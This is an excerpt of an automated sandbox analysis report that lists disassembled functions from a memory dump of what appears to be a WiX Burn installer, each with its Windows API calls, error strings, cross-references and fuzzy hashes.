TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,000C5466,?,?,?,?), ref: 000C4920
GetLastError.KERNEL32(?,?,?,000C5466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C4931
ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000C4A6E
CloseHandle.KERNEL32(?,?,?,?,000C5466,?,?,?,?,?,?,?,?,?,?,?), ref: 000C4A77

Strings

engine.cpp, xrefs: 000C4955, 000C499E
comres.dll, xrefs: 000C49DD
Failed to create the message window., xrefs: 000C49CC
Failed to allocate thread local storage for logging., xrefs: 000C495F
Failed to pump messages from parent process., xrefs: 000C4A42
Failed to set elevated pipe into thread local storage for logging., xrefs: 000C49A8
Failed to connect to unelevated process., xrefs: 000C4916

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AllocCloseErrorHandleLastMutexRelease
String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
API String ID: 687263955-1790235126
Opcode ID: 8b5ddc077b1a7b940b806e071472674ae8237fcb46ce2bacb4b506a3699f6dd3
Instruction ID: 25555860938c23004c5e24a2dde331c05fc87f7f7c44216e99665d2dd32b4338
Opcode Fuzzy Hash: 8b5ddc077b1a7b940b806e071472674ae8237fcb46ce2bacb4b506a3699f6dd3
Instruction Fuzzy Hash: 9941C773944626BBC7129BA0CC85FEFBBACFF04710F01022ABA55A7141DBB1AD5087E1

Function 000C7FA5 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 216COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 000C7FC2
LeaveCriticalSection.KERNEL32(?), ref: 000C81EA

Strings

Failed to get version., xrefs: 000C819B
Failed to write variable value as string., xrefs: 000C81AE
feclient.dll, xrefs: 000C809D, 000C80F3, 000C8134
Failed to write literal flag., xrefs: 000C81C3
Failed to write variable value type., xrefs: 000C81CA
Failed to get numeric., xrefs: 000C81BC
Failed to write variable value as number., xrefs: 000C8194
Failed to write variable name., xrefs: 000C81D1
Failed to get string., xrefs: 000C81B5
Unsupported variable type., xrefs: 000C81A7
Failed to write included flag., xrefs: 000C81D8
Failed to write variable count., xrefs: 000C7FDD

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
API String ID: 3168844106-2118673349
Opcode ID: dfcc625ecc1566ce2ff7f9be0bb5f635f97c60327100ea7d4ab618bfc044cd2b
Instruction ID: 1a4bd7bbe256dc2e0bc81cfcc1412c14113816743fa3c2d9e90008b8f7434e81
Opcode Fuzzy Hash: dfcc625ecc1566ce2ff7f9be0bb5f635f97c60327100ea7d4ab618bfc044cd2b
Instruction Fuzzy Hash: 4871907290062AEFCB629FA4C845FAE7BE8BF04350F14816AFD0067191DB71DD169B94

Function 000D97B2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,000DA843,00000000,00000000,00000000,?,00000000), ref: 000D97CD
GetLastError.KERNEL32(?,000DA843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 000D97DD

Part of subcall function 00104102: Sleep.KERNEL32(?,00000000,?,000D85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,000C4DBC), ref: 00104119

CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 000D98E9

Strings

Failed to verify payload signature: %ls, xrefs: 000D9838
Failed to verify payload hash: %ls, xrefs: 000D9875
Moving, xrefs: 000D987F
Copying, xrefs: 000D9888, 000D9893
Failed to move %ls to %ls, xrefs: 000D98C1
Failed to copy %ls to %ls, xrefs: 000D98D7
cache.cpp, xrefs: 000D9801
Failed to open payload in working path: %ls, xrefs: 000D980C
%ls payload from working path '%ls' to path '%ls', xrefs: 000D9894

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
API String ID: 1275171361-1604654059
Opcode ID: e0c6455b2df88028398ee531ad85f456ff3cc3f8cbb1292a29de7adff2131935
Instruction ID: 0015c35abd14080d893ab3dbfa72614f12f34e6dc2887dd747060a3276ecce94
Opcode Fuzzy Hash: e0c6455b2df88028398ee531ad85f456ff3cc3f8cbb1292a29de7adff2131935
Instruction Fuzzy Hash: EC31DB72A443307BDA322A558C4AFAF2A6CEF56F50F010126FE157B3C1DBA19D00A6F1

Function 000C65C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 000C65FC

Part of subcall function 00100ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,000C5EB2,00000000), ref: 00100AE0
Part of subcall function 00100ACC: GetProcAddress.KERNEL32(00000000), ref: 00100AE7
Part of subcall function 00100ACC: GetLastError.KERNEL32(?,?,?,000C5EB2,00000000), ref: 00100AFE

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 000C6628
GetLastError.KERNEL32 ref: 000C6636
GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 000C666E
GetLastError.KERNEL32 ref: 000C6678
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 000C66BB
GetLastError.KERNEL32 ref: 000C66C5

Strings

Failed to set system folder variant value., xrefs: 000C6724
variable.cpp, xrefs: 000C665A, 000C669C
Failed to get 64-bit system folder., xrefs: 000C6664
Failed to get 32-bit system folder., xrefs: 000C66A6
Failed to backslash terminate system folder., xrefs: 000C6708

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
API String ID: 325818893-1590374846
Opcode ID: f1a55068bb4ed1ce7bfa06de476f42224c17e49a8f77d61e0096df190c6c9cad
Instruction ID: 3e72ad309c83cb7838480660d1cc5476391288e7d81365aedeae0fc1ba9f04cd
Opcode Fuzzy Hash: f1a55068bb4ed1ce7bfa06de476f42224c17e49a8f77d61e0096df190c6c9cad
Instruction Fuzzy Hash: 74314572D45239A7DB3097A18D49F9F77A8AF00750F014269BD04BB2C1DBB6DD808AE1

Function 000D3F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000D3AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,000D3FB5,feclient.dll,?,00000000,?,?,?,000C4B12), ref: 000D3B42

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,000C4B12,?,?,0010B488,?,00000001,00000000,00000000), ref: 000D404C

Strings

log, xrefs: 000D3FF3
Setup, xrefs: 000D3FF9
clbcatq.dll, xrefs: 000D4185
feclient.dll, xrefs: 000D3FAF, 000D405C
msasn1.dll, xrefs: 000D4162, 000D41A3
Failed to open log: %ls, xrefs: 000D40C8
crypt32.dll, xrefs: 000D3FF2, 000D4057, 000D405F, 000D40C6, 000D4100, 000D4141, 000D4160, 000D419E, 000D41C8
Failed to copy log path to prefix., xrefs: 000D416E
Failed to get current directory., xrefs: 000D402E
Failed to copy full log path to prefix., xrefs: 000D41AF
Failed to copy log extension to extension., xrefs: 000D4191
Failed to get non-session specific TEMP folder., xrefs: 000D40F6

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: 7871767a4029ed0951dc32d844a81b3d7c87915b244b85ae24bb4516583fc4aa
Instruction ID: 4d85e01733f98f37a68391f0aae2e5a73ba649d88d34736f5aa66b3f8a79c48f
Opcode Fuzzy Hash: 7871767a4029ed0951dc32d844a81b3d7c87915b244b85ae24bb4516583fc4aa
Instruction Fuzzy Hash: 4A618071A00715ABDB669F64CC46BAA7BE8EF24340F044166F901DB291E7B1EE9087B1

Function 000C6DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,000C5445,00000006,?,000C82B9,?,?,?,00000000,00000000,00000001), ref: 000C6DC8

Part of subcall function 000C56A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,000C6595,000C6595,?,000C563D,?,?,00000000), ref: 000C56E5
Part of subcall function 000C56A9: GetLastError.KERNEL32(?,000C563D,?,?,00000000,?,?,000C6595,?,000C7F02,?,?,?,?,?), ref: 000C5714

LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,000C82B9), ref: 000C6F59

Strings

Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 000C6F6B
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 000C6ED0
Failed to insert variable '%ls'., xrefs: 000C6E0D
Setting numeric variable '%ls' to value %lld, xrefs: 000C6EFA
variable.cpp, xrefs: 000C6E4B
Setting hidden variable '%ls', xrefs: 000C6E86
Failed to set value of variable: %ls, xrefs: 000C6F41
Failed to find variable value '%ls'., xrefs: 000C6DE3
Setting string variable '%ls' to value '%ls', xrefs: 000C6EED
Attempt to set built-in variable value: %ls, xrefs: 000C6E56
Unsetting variable '%ls', xrefs: 000C6F15

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: 1a6eebe1fbe957504871ddb361326c299cf57d4691d6488fc95751747f5739b2
Instruction ID: 48b8a19a979e30741f00a47a14fe5cc7a3fd7b0580c55186097bd26c62aca232
Opcode Fuzzy Hash: 1a6eebe1fbe957504871ddb361326c299cf57d4691d6488fc95751747f5739b2
Instruction Fuzzy Hash: C651C4B1A40225A7DB309F59DD4AF6F3BA8EF55714F10012EF885662C2C3B7D941CAE1

Function 000D2C1C Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 299COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 000D2C8A

Strings

wininet.dll, xrefs: 000D2ED7
Failed to add registration action for dependent related bundle., xrefs: 000D2F8E
Failed to add registration action for self dependent., xrefs: 000D2F57
Failed to create the string dictionary., xrefs: 000D2CC3
crypt32.dll, xrefs: 000D2CD5, 000D2DCF, 000D2EC4, 000D2F39
Failed to add dependent bundle provider key to ignore dependents., xrefs: 000D2DF4
Failed to add dependents ignored from command-line., xrefs: 000D2D3F
Failed to check for remaining dependents during planning., xrefs: 000D2E30
Failed to allocate registration action., xrefs: 000D2CF3
Failed to add self-dependent to ignore dependents., xrefs: 000D2D0E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
API String ID: 1825529933-1705955799
Opcode ID: 7259a24ed1dac7c39a6cc72604430d9a6c384a05ef44286f0aec9064dd2b6005
Instruction ID: 77cc9e0c9bb35c9d9be199b6976b100185a393e612a2b3df2e1cb67216039fc4
Opcode Fuzzy Hash: 7259a24ed1dac7c39a6cc72604430d9a6c384a05ef44286f0aec9064dd2b6005
Instruction Fuzzy Hash: E2B16A70A04316EBCB699F24C841BAE7BB6BF24711F10857AF815AB351D770D9A0CBA1

Function 000DF90B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 187COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000DF947
UuidCreate.RPCRT4(?), ref: 000DFA2A
StringFromGUID2.OLE32(?,?,00000027), ref: 000DFA4B
LeaveCriticalSection.KERNEL32(?,?), ref: 000DFAF4

Strings

Failed to create bundle update guid., xrefs: 000DFA37
Failed to recreate command-line for update bundle., xrefs: 000DFA12
Failed to set update bundle., xrefs: 000DFACE
Failed to convert bundle update guid into string., xrefs: 000DFA6A
EngineForApplication.cpp, xrefs: 000DFA60
update\%ls, xrefs: 000DF9A3
Failed to default local update source, xrefs: 000DF9B7

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$CreateEnterFromLeaveStringUuid
String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
API String ID: 171215650-2594647487
Opcode ID: cde50495068e0704e11b62ebbcc0cde225ec55586961c5b72dac7a951715cb23
Instruction ID: ee3cb20e56d1ceae437c2ad4c1b57c654744007a5b2522b7929b0dc9aac06b31
Opcode Fuzzy Hash: cde50495068e0704e11b62ebbcc0cde225ec55586961c5b72dac7a951715cb23
Instruction Fuzzy Hash: 43618E71940316ABCF619FA4C845FAEBBB4EF08710F15817AF80AAB252D7719C50CBA1

Function 000C4AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 000C4C64
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000C4C75

Strings

Failed to set layout directory variable to value provided from command-line., xrefs: 000C4C06
Failed to create the message window., xrefs: 000C4B98
Failed to open log., xrefs: 000C4B18
Failed while running , xrefs: 000C4C2A
WixBundleLayoutDirectory, xrefs: 000C4BF5
Failed to set action variables., xrefs: 000C4BC4
Failed to query registration., xrefs: 000C4BAE
Failed to check global conditions, xrefs: 000C4B49
Failed to set registration variables., xrefs: 000C4BDE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: 4a117cdc43b2f4a4e5b4ce4edc5837eb050a492a63c99d3dc47a6d32673965cc
Instruction ID: 0cdd0b589581c03a2854b76fd9ac9e6d70bbf1058f10e00e546509ca9653c593
Opcode Fuzzy Hash: 4a117cdc43b2f4a4e5b4ce4edc5837eb050a492a63c99d3dc47a6d32673965cc
Instruction Fuzzy Hash: B741F83160561ABBCB665B60CDE5FEEB65CFF04754F00421AF804962A1D7F1ED5097D0

Function 000DF051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 000DF06E
LeaveCriticalSection.KERNEL32(?), ref: 000DF19B

Strings

Failed to copy the id., xrefs: 000DF100
Engine is active, cannot change engine state., xrefs: 000DF089
Failed to post launch approved exe message., xrefs: 000DF186
EngineForApplication.cpp, xrefs: 000DF17C
UX requested unknown approved exe with id: %ls, xrefs: 000DF0CE
Failed to copy the arguments., xrefs: 000DF12D

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterLeaveProcess
String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
API String ID: 1367039788-528931743
Opcode ID: 217c41bfd864c991ae9f67ec17e72350ba04aad26ae1d40ba8b8caf2873a8d81
Instruction ID: 95fd01b8f68b8ab30123bba66a5408a47b3eff74e4644cad2152cd1f74fb1840
Opcode Fuzzy Hash: 217c41bfd864c991ae9f67ec17e72350ba04aad26ae1d40ba8b8caf2873a8d81
Instruction Fuzzy Hash: 2731C336A45326EBDB219F64DC45EAA7BE8AF04720B05C436FD05EB352EB71DD4087A0

Function 000D969D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,000DA7D4,00000000,00000000,00000000,?,00000000), ref: 000D96B8
GetLastError.KERNEL32(?,000DA7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 000D96C6

Part of subcall function 00104102: Sleep.KERNEL32(?,00000000,?,000D85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,000C4DBC), ref: 00104119

CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 000D97A4

Strings

Failed to open container in working path: %ls, xrefs: 000D96F5
Moving, xrefs: 000D973A
Copying, xrefs: 000D9743, 000D974E
Failed to move %ls to %ls, xrefs: 000D977C
Failed to verify container hash: %ls, xrefs: 000D9727
Failed to copy %ls to %ls, xrefs: 000D9792
cache.cpp, xrefs: 000D96EA
%ls container from working path '%ls' to path '%ls', xrefs: 000D974F

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
API String ID: 1275171361-1187406825
Opcode ID: 4158e65fa764f4b400e5cb215db435f2393b5b5e5258f29a2932e02dd72acac2
Instruction ID: 166d2a1ce9644cb4205901df4507d0c48113a942d19abf4afb903f0bccb049d1
Opcode Fuzzy Hash: 4158e65fa764f4b400e5cb215db435f2393b5b5e5258f29a2932e02dd72acac2
Instruction Fuzzy Hash: 55210572A883247BD6321A148C8AFAF366CDF51B60F110126FE54BB3C1D7A2AC41C6F5

Function 000C6F85 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 000C6FB2
LeaveCriticalSection.KERNEL32(?), ref: 000C71BE

Strings

Failed to set variable value., xrefs: 000C7171
Failed to read variable literal flag., xrefs: 000C7199
Failed to read variable value as string., xrefs: 000C718B
Failed to read variable count., xrefs: 000C6FD2
Failed to read variable name., xrefs: 000C71A7
Failed to read variable value type., xrefs: 000C71A0
Failed to set variable., xrefs: 000C7192
Failed to read variable value as number., xrefs: 000C7178
Unsupported variable type., xrefs: 000C7184
Failed to read variable included flag., xrefs: 000C71AE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
API String ID: 3168844106-528957463
Opcode ID: 0ecf84cb55025c434a3d8005597dcb3ef8b75b841a9737f3030d94b07133fb28
Instruction ID: 604819038a1d51b3aa619c2ac1475bce5d50b20c57058ed7c532124c00620fd6
Opcode Fuzzy Hash: 0ecf84cb55025c434a3d8005597dcb3ef8b75b841a9737f3030d94b07133fb28
Instruction Fuzzy Hash: C3718B72C0425EABDF22DBA8DC45FAEBBB9EF04710F144129FD04A61A1D7719E509FA0

Function 001044D1 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 00104550
GetLastError.KERNEL32 ref: 00104566
GetFileSizeEx.KERNEL32(00000000,?), ref: 001045BF
GetLastError.KERNEL32 ref: 001045C9
SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 0010461D
GetLastError.KERNEL32 ref: 00104628
ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 00104717
CloseHandle.KERNEL32(?), ref: 0010478A

Strings

fileutil.cpp, xrefs: 001044F1, 001045A8, 001045E9, 0010476D

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
String ID: fileutil.cpp
